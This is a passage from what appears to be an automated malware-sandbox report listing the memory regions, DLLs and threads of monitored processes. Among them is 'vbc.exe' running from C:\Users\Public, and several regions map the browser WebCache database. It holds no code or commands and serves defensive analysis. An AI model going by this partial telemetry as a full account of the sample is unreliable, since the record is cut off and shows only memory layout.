monitored = 0 entry_point = 0x7ffd4e1738b0 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 1035 start_va = 0x7ffd4e1c0000 end_va = 0x7ffd4e26cfff monitored = 0 entry_point = 0x7ffd4e1d81a0 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1036 start_va = 0x7ffd4e2e0000 end_va = 0x7ffd4e31afff monitored = 0 entry_point = 0x7ffd4e2e12f0 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 1037 start_va = 0x7ffd4e480000 end_va = 0x7ffd4e526fff monitored = 0 entry_point = 0x7ffd4e4958d0 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 1038 start_va = 0x7ffd4e9d0000 end_va = 0x7ffd4eb25fff monitored = 0 entry_point = 0x7ffd4e9da8d0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 1039 start_va = 0x7ffd4eb30000 end_va = 0x7ffd5008efff monitored = 0 entry_point = 0x7ffd4ec911f0 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 1040 start_va = 0x7ffd500f0000 end_va = 0x7ffd50141fff monitored = 0 entry_point = 0x7ffd500ff530 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 1041 start_va = 0x7ffd50150000 end_va = 0x7ffd501f6fff monitored = 0 entry_point = 0x7ffd5015b4d0 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 1042 start_va = 0x7ffd504d0000 end_va = 0x7ffd50690fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1274 start_va = 0x2320000 end_va = 0x232ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 1275 start_va = 0x2340000 end_va = 0x2347fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002340000" filename = "" Region: id = 1276 start_va = 0x2350000 end_va = 0x235ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 1277 start_va = 0x2360000 end_va = 0x2360fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 1323 start_va = 0x2360000 end_va = 0x2367fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 1351 start_va = 0x2370000 end_va = 0x2377fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002370000" filename = "" Region: id = 1352 start_va = 0x2380000 end_va = 0x2380fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002380000" filename = "" Region: id = 1382 start_va = 0x2380000 end_va = 0x2380fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002380000" filename = "" Region: id = 1429 start_va = 0x2380000 end_va = 0x238ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 1430 start_va = 0x2370000 end_va = 0x2370fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002370000" filename = "" Region: id = 1464 start_va = 0x2370000 end_va = 0x2370fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002370000" filename = "" Region: id = 1465 start_va = 0x2390000 end_va = 0x2397fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002390000" filename = "" Region: id = 1498 start_va = 0x2370000 end_va = 0x2377fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002370000" filename = "" Region: id = 1685 start_va = 0x2390000 end_va = 0x239ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 1686 start_va = 0x2340000 end_va = 0x234ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 1688 start_va = 0x2370000 end_va = 0x237ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 1691 start_va = 0x2360000 end_va = 0x2367fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 1692 start_va = 0x23a0000 end_va = 0x23a0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000023a0000" filename = "" Region: id = 1732 start_va = 0x23a0000 end_va = 0x23a7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000023a0000" filename = "" Region: id = 1733 start_va = 0x23b0000 end_va = 0x23b7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000023b0000" filename = "" Region: id = 1734 start_va = 0x23c0000 end_va = 0x23c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000023c0000" filename = "" Region: id = 1735 start_va = 0x23d0000 end_va = 0x23d7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000023d0000" filename = "" Region: id = 1759 start_va = 0x23c0000 end_va = 0x23cffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 1760 start_va = 0x2360000 end_va = 0x236ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 1761 start_va = 0x23a0000 end_va = 0x23affff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 1788 start_va = 0x23a0000 end_va = 0x23a0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000023a0000" filename = "" Region: id = 1789 start_va = 0x23b0000 end_va = 0x23b7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000023b0000" filename = "" Region: id = 1797 start_va = 0x23a0000 end_va = 0x23a0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000023a0000" filename = "" Region: id = 1798 start_va = 0x23a0000 end_va = 0x23a7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000023a0000" filename = "" Region: id = 1799 start_va = 0x23b0000 end_va = 0x23b7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000023b0000" filename = "" Region: id = 1806 start_va = 0x23d0000 end_va = 0x23d7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000023d0000" filename = "" Region: id = 1807 start_va = 0x23e0000 end_va = 0x23e7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000023e0000" filename = "" Region: id = 1808 start_va = 0x23f0000 end_va = 0x23f7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000023f0000" filename = "" Region: id = 1809 start_va = 0x3900000 end_va = 0x390ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 1826 start_va = 0x3910000 end_va = 0x391ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 1830 start_va = 0x23a0000 end_va = 0x23affff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 1831 start_va = 0x23b0000 end_va = 0x23bffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 1832 start_va = 0x23f0000 end_va = 0x23fffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 1837 start_va = 0x23d0000 end_va = 0x23dffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 1844 start_va = 0x3900000 end_va = 0x3900fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003900000" filename = "" Region: id = 1845 start_va = 0x3930000 end_va = 0x3937fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003930000" filename = "" Region: id = 1865 start_va = 0x3900000 end_va = 0x3900fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003900000" filename = "" Thread: id = 37 os_tid = 0xb04 Thread: id = 38 os_tid = 0xbf0 Thread: id = 39 os_tid = 0xe7c Thread: id = 40 os_tid = 0x4d8 Thread: id = 41 os_tid = 0xb78 Thread: id = 42 os_tid = 0xb70 Thread: id = 43 os_tid = 0xb64 Process: id = "4" image_name = "vbc.exe" filename = "c:\\users\\public\\vbc.exe" page_root = "0x7c633000" os_pid = "0x6f0" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x10d4" cmd_line = "\"C:\\Users\\Public\\vbc.exe\" " cur_dir = "C:\\Windows\\system32\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f4cd" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1061 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 1062 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 1063 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 1064 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 1065 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 1066 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 1067 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 1068 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 1069 start_va = 0x400000 end_va = 0x42cfff monitored = 1 entry_point = 0x403225 region_type = mapped_file name = "vbc.exe" filename = "\\Users\\Public\\vbc.exe" (normalized: "c:\\users\\public\\vbc.exe") Region: id = 1070 start_va = 0x77b90000 end_va = 0x77d0afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 1071 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 1072 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1073 start_va = 0x7fff0000 end_va = 0x7ffd504cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 1074 start_va = 0x7ffd504d0000 end_va = 0x7ffd50690fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1075 start_va = 0x7ffd50691000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffd50691000" filename = "" Region: id = 1076 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 1080 start_va = 0x620000 end_va = 0x62ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000620000" filename = "" Region: id = 1081 start_va = 0x6edd0000 end_va = 0x6ee1ffff monitored = 0 entry_point = 0x6ede8180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 1082 start_va = 0x6ee20000 end_va = 0x6ee99fff monitored = 0 entry_point = 0x6ee33290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 1083 start_va = 0x74f30000 end_va = 0x7500ffff monitored = 0 entry_point = 0x74f43980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 1084 start_va = 0x6eea0000 end_va = 0x6eea7fff monitored = 0 entry_point = 0x6eea17c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 1085 start_va = 0x430000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000430000" filename = "" Region: id = 1086 start_va = 0x74f30000 end_va = 0x7500ffff monitored = 0 entry_point = 0x74f43980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 1087 start_va = 0x76ad0000 end_va = 0x76c4dfff monitored = 0 entry_point = 0x76b81b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 1088 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1089 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 1090 start_va = 0x540000 end_va = 0x5fdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1091 start_va = 0x74810000 end_va = 0x748a1fff monitored = 0 entry_point = 0x74850380 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\SysWOW64\\apphelp.dll" (normalized: "c:\\windows\\syswow64\\apphelp.dll") Region: id = 1092 start_va = 0x7fb00000 end_va = 0x7fea0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sysmain.sdb" filename = "\\Windows\\AppPatch\\sysmain.sdb" (normalized: "c:\\windows\\apppatch\\sysmain.sdb") Region: id = 1093 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1094 start_va = 0x750d0000 end_va = 0x75216fff monitored = 0 entry_point = 0x750e1cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 1095 start_va = 0x77440000 end_va = 0x7758efff monitored = 0 entry_point = 0x774f6820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 1096 start_va = 0x630000 end_va = 0x66ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000630000" filename = "" Region: id = 1097 start_va = 0x670000 end_va = 0x76ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000670000" filename = "" Region: id = 1098 start_va = 0x75690000 end_va = 0x76a8efff monitored = 0 entry_point = 0x7584b990 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 1099 start_va = 0x74a10000 end_va = 0x74acdfff monitored = 0 entry_point = 0x74a45630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 1100 start_va = 0x76a90000 end_va = 0x76ac6fff monitored = 0 entry_point = 0x76a93b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll") Region: id = 1101 start_va = 0x76e20000 end_va = 0x77318fff monitored = 0 entry_point = 0x77027610 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\SysWOW64\\windows.storage.dll" (normalized: "c:\\windows\\syswow64\\windows.storage.dll") Region: id = 1102 start_va = 0x752b0000 end_va = 0x7546cfff monitored = 0 entry_point = 0x75392a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 1103 start_va = 0x74e80000 end_va = 0x74f2cfff monitored = 0 entry_point = 0x74e94f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 1104 start_va = 0x748c0000 end_va = 0x748ddfff monitored = 0 entry_point = 0x748cb640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 1105 start_va = 0x748b0000 end_va = 0x748b9fff monitored = 0 entry_point = 0x748b2a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 1106 start_va = 0x77680000 end_va = 0x776d7fff monitored = 0 entry_point = 0x776c25c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 1107 start_va = 0x76c50000 end_va = 0x76c93fff monitored = 0 entry_point = 0x76c69d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 1108 start_va = 0x77b10000 end_va = 0x77b8afff monitored = 0 entry_point = 0x77b2e970 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 1109 start_va = 0x77590000 end_va = 0x775d4fff monitored = 0 entry_point = 0x775ade90 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 1110 start_va = 0x77320000 end_va = 0x7732bfff monitored = 0 entry_point = 0x77323930 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 1111 start_va = 0x775e0000 end_va = 0x7766cfff monitored = 0 entry_point = 0x77629b90 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll") Region: id = 1112 start_va = 0x74e20000 end_va = 0x74e63fff monitored = 0 entry_point = 0x74e27410 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\SysWOW64\\powrprof.dll" (normalized: "c:\\windows\\syswow64\\powrprof.dll") Region: id = 1113 start_va = 0x77670000 end_va = 0x7767efff monitored = 0 entry_point = 0x77672e40 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 1114 start_va = 0x74ad0000 end_va = 0x74bbafff monitored = 0 entry_point = 0x74b0d650 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 1115 start_va = 0x688a0000 end_va = 0x68931fff monitored = 0 entry_point = 0x688add60 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll") Region: id = 1116 start_va = 0x69510000 end_va = 0x69517fff monitored = 0 entry_point = 0x695117b0 region_type = mapped_file name = "version.dll" filename = "\\Windows\\SysWOW64\\version.dll" (normalized: "c:\\windows\\syswow64\\version.dll") Region: id = 1117 start_va = 0x1d0000 end_va = 0x1f9fff monitored = 0 entry_point = 0x1d5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 1118 start_va = 0x770000 end_va = 0x8f7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000770000" filename = "" Region: id = 1119 start_va = 0x75660000 end_va = 0x7568afff monitored = 0 entry_point = 0x75665680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 1120 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 1121 start_va = 0x1d0000 end_va = 0x1d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 1122 start_va = 0x900000 end_va = 0xa80fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000900000" filename = "" Region: id = 1123 start_va = 0xa90000 end_va = 0x1e8ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a90000" filename = "" Region: id = 1124 start_va = 0x1e90000 end_va = 0x1f5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e90000" filename = "" Region: id = 1125 start_va = 0x1f60000 end_va = 0x208ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001f60000" filename = "" Region: id = 1126 start_va = 0x1e90000 end_va = 0x1f20fff monitored = 0 entry_point = 0x1ec8cf0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 1127 start_va = 0x1f50000 end_va = 0x1f5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001f50000" filename = "" Region: id = 1128 start_va = 0x70970000 end_va = 0x709e4fff monitored = 0 entry_point = 0x709a9a60 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 1129 start_va = 0x2090000 end_va = 0x226ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002090000" filename = "" Region: id = 1130 start_va = 0x67e00000 end_va = 0x67e05fff monitored = 0 entry_point = 0x67e01570 region_type = mapped_file name = "shfolder.dll" filename = "\\Windows\\SysWOW64\\shfolder.dll" (normalized: "c:\\windows\\syswow64\\shfolder.dll") Region: id = 1131 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 1132 start_va = 0x2270000 end_va = 0x25a6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 1149 start_va = 0x74d80000 end_va = 0x74e11fff monitored = 0 entry_point = 0x74db8cf0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 1151 start_va = 0x1e90000 end_va = 0x1ecffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e90000" filename = "" Region: id = 1152 start_va = 0x1f60000 end_va = 0x205ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001f60000" filename = "" Region: id = 1153 start_va = 0x2080000 end_va = 0x208ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002080000" filename = "" Region: id = 1154 start_va = 0x1f0000 end_va = 0x1f0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001f0000" filename = "" Region: id = 1155 start_va = 0x75220000 end_va = 0x752a3fff monitored = 0 entry_point = 0x75246220 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll") Region: id = 1156 start_va = 0x430000 end_va = 0x430fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000430000" filename = "" Region: id = 1157 start_va = 0x440000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000440000" filename = "" Region: id = 1158 start_va = 0x72850000 end_va = 0x7299afff monitored = 0 entry_point = 0x728b1660 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\SysWOW64\\propsys.dll" (normalized: "c:\\windows\\syswow64\\propsys.dll") Region: id = 1159 start_va = 0x600000 end_va = 0x603fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.1.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Caches\\cversions.1.db" (normalized: 